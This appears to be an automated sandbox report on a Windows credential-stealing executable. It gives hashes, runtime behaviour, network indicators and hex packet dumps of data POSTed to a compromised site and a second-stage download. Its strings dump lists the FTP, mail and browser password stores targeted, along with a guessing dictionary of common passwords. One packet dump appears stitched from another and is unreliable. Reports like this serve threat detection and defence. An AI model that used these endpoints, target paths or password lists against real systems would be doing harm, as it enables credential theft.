Analysis Date: 2014-09-21 21:08:44
MD5: e604b5460941b0c94e60b1453ee2de3e
SHA1: b1fdff460a97413a8df465910b5d33ca39a9de4f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d68e6bd337614ed69fd3654577879058 sha1: ea802467c08aeffa7d01a40496f793a0eef24bd8 size: 73728
Section .rdata md5: ea55f1bb8edcc7d52cc0e03f8c79e7e9 sha1: 3961dc0a2888ccac22b88d8751f95a8d51f19f7f size: 4096
Section .data md5: 31ba974a8b4397f4b2d30fa650c48189 sha1: d4225878f6c2d61f5cf324abb8da3fea210aeafb size: 24576
Section .reloc md5: 3458b6a8cbe9672e146626adaa19f2be sha1: 10552542b81654ef7e1ac0ec41baf5a46d249b42 size: 8192
Timestamp: 2014-08-19 10:39:09
Packer: Stranik 1.3 Modula/C/Pascal
PEhash: 92a3064da840c58159a75b80f284373eb7e690f4
IMPhash: 65e9bbea53a9396550cbbe64462a7930

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\WinRAR\HWID ➝ NULL
Creates File: PIPE\samr
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\93093.bat
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe

Network Details:

DNS: medcareparatransit.com
Type: A
192.186.235.6
DNS: truongvietgroup.com
Type: A
221.132.33.23
HTTP POST: http://medcareparatransit.com/wp-content/themes/Migos/zur.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
HTTP POST: http://medcareparatransit.com/wp-content/themes/Migos/zur.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
HTTP GET: http://truongvietgroup.com/wp-content/plugins/lube.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
Flows TCP: 192.168.1.1:1031 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1032 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1033 ➝ 221.132.33.23:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 4d69676f 732f7a75   /themes/Migos/zu
0x00000020 (00032)   722e7068 70204854 54502f31 2e300d0a   r.php HTTP/1.0..
0x00000030 (00048)   486f7374 3a206d65 64636172 65706172   Host: medcarepar
0x00000040 (00064)   61747261 6e736974 2e636f6d 0d0a4163   atransit.com..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000070 (00112)   74697479 2c202a3b 713d300d 0a436f6e   tity, *;q=0..Con
0x00000080 (00128)   74656e74 2d4c656e 6774683a 20323733   tent-Length: 273
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a436f6e 74656e74 2d547970   ose..Content-Typ
0x000000b0 (00176)   653a2061 70706c69 63617469 6f6e2f6f   e: application/o
0x000000c0 (00192)   63746574 2d737472 65616d0d 0a436f6e   ctet-stream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 4d69676f 732f7a75   /themes/Migos/zu
0x00000020 (00032)   722e7068 70204854 54502f31 2e300d0a   r.php HTTP/1.0..
0x00000030 (00048)   486f7374 3a206d65 64636172 65706172   Host: medcarepar
0x00000040 (00064)   61747261 6e736974 2e636f6d 0d0a4163   atransit.com..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000070 (00112)   74697479 2c202a3b 713d300d 0a436f6e   tity, *;q=0..Con
0x00000080 (00128)   74656e74 2d4c656e 6774683a 20323733   tent-Length: 273
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a436f6e 74656e74 2d547970   ose..Content-Typ
0x000000b0 (00176)   653a2061 70706c69 63617469 6f6e2f6f   e: application/o
0x000000c0 (00192)   63746574 2d737472 65616d0d 0a436f6e   ctet-stream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   706c7567 696e732f 6c756265 2e657865   plugins/lube.exe
0x00000020 (00032)   20485454 502f312e 300d0a48 6f73743a    HTTP/1.0..Host:
0x00000030 (00048)   20747275 6f6e6776 69657467 726f7570    truongvietgroup
0x00000040 (00064)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000050 (00080)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000060 (00096)   6e673a20 6964656e 74697479 2c202a3b   ng: identity, *;
0x00000070 (00112)   713d300d 0a436f6e 6e656374 696f6e3a   q=0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 55736572 2d416765    close..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000a0 (00160)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000b0 (00176)   4520352e 303b2057 696e646f 777a2058   E 5.0; Windowz X
0x000000c0 (00192)   50290d0a 0d0a7472 65616d0d 0a436f6e   P)....tream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..


Strings
..
\
\
  

cmd.exe
 /c start "" "%s"
Info
jjjj
jjjjjj
runas
:&:,:\:
000000
0 0&000K0
0 0&0/050I0R0X0a0g0
0'020<0E0P0u0
0"0G0R0w0
0$0Y0u0
0#191H1.2C2Z2o2
:$:*:0:6:<:B:H:N:T:Z:`:f:l:r:x:~:
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
<0=A=U=o=t=y=
<0<C<V<o<
?0E0O0j0
111111
11111111
112233
1*1E1`1{1
1<1x1}1
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
1G132P2
1Q1_1x1
1q2w3e
1q2w3e4r
20292M2
'2, /+0&7!4-)1#
2,21272H2R2b2l2
222222
2/3e3y3
2+3U3p3
2.5.29.37
;2;E;`;
2G3M3Z3m3
\32BitFtp.ini
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
;3+#>6.&
394?4L4^4d4q4
:3;9;F;Z;_;
\3D-FTP
3D-FTP
4%414s4
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4
4/4J4t4
4je[9dmgi4hoD;viKd4m
=/=4=N=S=
51565<5I5N5T5a5f5l5y5~5
5%50565<5A5G5P5V5`5~5
5f6r6|6
607I7X7a7g7
616D6X6l6
654321
657;7H7M7Y7_7s7x7
6%606@6H6S6
666666
6$666;6M6R6d6i6{6
6)6:6R6f6w6
6&686D6V6b6t6
6?6K6]6i6{6
>6>N>j>
6':;:p:
=6>S>f>
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7777777
7^8c8t8y8
;+;7;'<]<b<
:":7:S:g:
8*8/848:8G8L8Q8p8
888=8F8T8e8
8+8E8S8
8=8h8m8|8
8.8M8l8u8~8
8 9+909?9D9J9X9i9
8$9A9`9
8^9k9-:A:l:{:
;/<8<A<J<Z<
8I9Z9k9
;8<I<V<
8L9X9b9
9):.:[:
9|$4r4
9"9(9.949:9@9F9L9R9X9^9d9j9p9v9|9
9#9(9=9B9G9L9Q9V9n9
9*9/9H9]9b9h9|9
9!9j9s9
9"9Z9l9
9D$(ub
?'?9?E?W?c?z?
<&=9=M=a=
9':Q:l:
9W9*;T;];f;
aaaaaa
abc123
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
:*:A:g:
AllocateAndInitializeSid
amanda
=#=/=A=M=d=p=4?G?V?
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
>)>B>K>T>\>
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
C7N7Y7d7
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
;	<(<><C<I<^<c<i<
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
CoInitializeEx
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CoUninitialize
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
%d.bat
Default
DEFDIR
 del 	  %0 
     del    	 %1  
DeleteFileA
DeluxeFTP
destiny
%d.exe
dexter
diamond
digital
Dir #%d
Directory
DisplayName
<?<D<J<n<s<y<
;'<d=j=w=
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
FastTrack
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
:f:x:}:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleBaseNameW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GET %s HTTP/1.0
GetSidSubAuthority
GetSidSubAuthorityCount
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetVersionExW
GetWindowLongA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
h0n0{0
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
History
\History.dat
History.dat
:#:):H:M:S:r:w:
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
:H:R:q:
http://
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
http://medcareparatransit.com/wp-content/themes/Migos/zur.php
HTTP Password
https://
HTTP Server URL
http://truongvietgroup.com/wp-content/plugins/lube.exe
HTTP User
hunter
identification
identities
Identities
identitymgr
	if  		 exist 	   %1  	  goto 	
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
=@=]=j=
jasmine
jasper
<*<J<e<
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
	   :ktk   
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
?(?L?Q?z?
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
=">M>_>
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
memset
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
msvcrt.dll
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
\Opera Software\Opera Next
\Opera Software\Opera Stable
orange
\Orbitum
origin_url
?!?&?+?o?t?z?
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathAppendW
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
psapi.dll
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
;+;Q;_;m;
quick.dat
\Quick.dat
>Q?V?\?p?
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
      "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
ShellExecuteExW
Shell_TrayWnd
SHGetFolderPathA
SHGetFolderPathW
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
tahO]A
taylor
Technology
tEh3kA
tEhIkA
tEh	lA
tEhsbA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhnHA
t#h>]A
\The Bat!
!This program cannot be run in DOS mode.
t=hnHA
t-hnHA
t.hnHA
t(hnHA
thomas
t|hsfA
tHSPPj%P
thunder
Thunderbird
\Thunderbird
tigger
tKh!YA
TMTPWDFILE0TMTPKDFILE0TMTCRYPTED0TMT1.0
tNh9[A
trinity
trustno1
tshZUA
\TurboFTP
uehvhA
u hnHA
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
V4`4j4t4~4
v89l$D|0
value="
_VanDyke\Config\Sessions
victory
\Visicom Media
_vsnwprintf
VWhQeA
VWPSQR
WaitForSingleObject
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
:";';X;
xflags
\Yandex
zxcvbnm
